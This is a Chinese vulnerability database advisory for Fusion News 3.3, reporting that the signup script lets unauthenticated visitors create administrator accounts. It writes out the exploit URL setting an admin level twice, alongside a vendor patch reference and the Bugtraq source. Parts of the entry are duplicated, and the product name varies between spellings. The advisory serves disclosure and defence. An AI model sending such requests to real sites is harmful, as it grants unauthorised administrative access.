Fusion News未授权增加帐户漏洞
添加时间:
2005-08-15
系统编号:
WAVDB-00351
BUGTRAQ: 8441
影响版本:
Fusen News 3.3
程序介绍:
漏洞利用:
解决方案:
厂商补丁:
Fusionphp
---------
在Fusion news 3.3已经修正此漏洞:
http://www.fusionphp.net/index.php?id=fnews/fn_features
信息来源:
<*来源:DarkKnight (mbuzz04@yahoo.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106096376727495&w=2
*>
2005-08-15
系统编号:
WAVDB-00351
BUGTRAQ: 8441
影响版本:
Fusen News 3.3
程序介绍:
Fusion News是一款在线新闻发布系统。
漏洞分析:
Fusion News对增加帐户脚本的请求缺少充分访问和权限限制,远程攻击者可以利用这个漏洞随意增加用户,以管理员权限访问应用系统。
当增加帐户时,Fusion News 3.3没有执行任意登录检查和限制,允许攻击者通过提交URL增加帐户,下面的请求:
http://www.website.com/FusenNews/?
id=signup&username=DarkKnight&email=EMAIL@EMAIL.COM+&password=123456&icon=
≤=3
可以增加密码为 123456 的 DarkKnight 帐户,其权限为管理员权限。
漏洞利用:
http://www.website.com/FusenNews/?
id=signup&username=DarkKnight&email=EMAIL@EMAIL.COM+&password=123456&icon=
≤=3
解决方案:
厂商补丁:
Fusionphp
---------
在Fusion news 3.3已经修正此漏洞:
http://www.fusionphp.net/index.php?id=fnews/fn_features
信息来源:
<*来源:DarkKnight (mbuzz04@yahoo.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=106096376727495&w=2
*>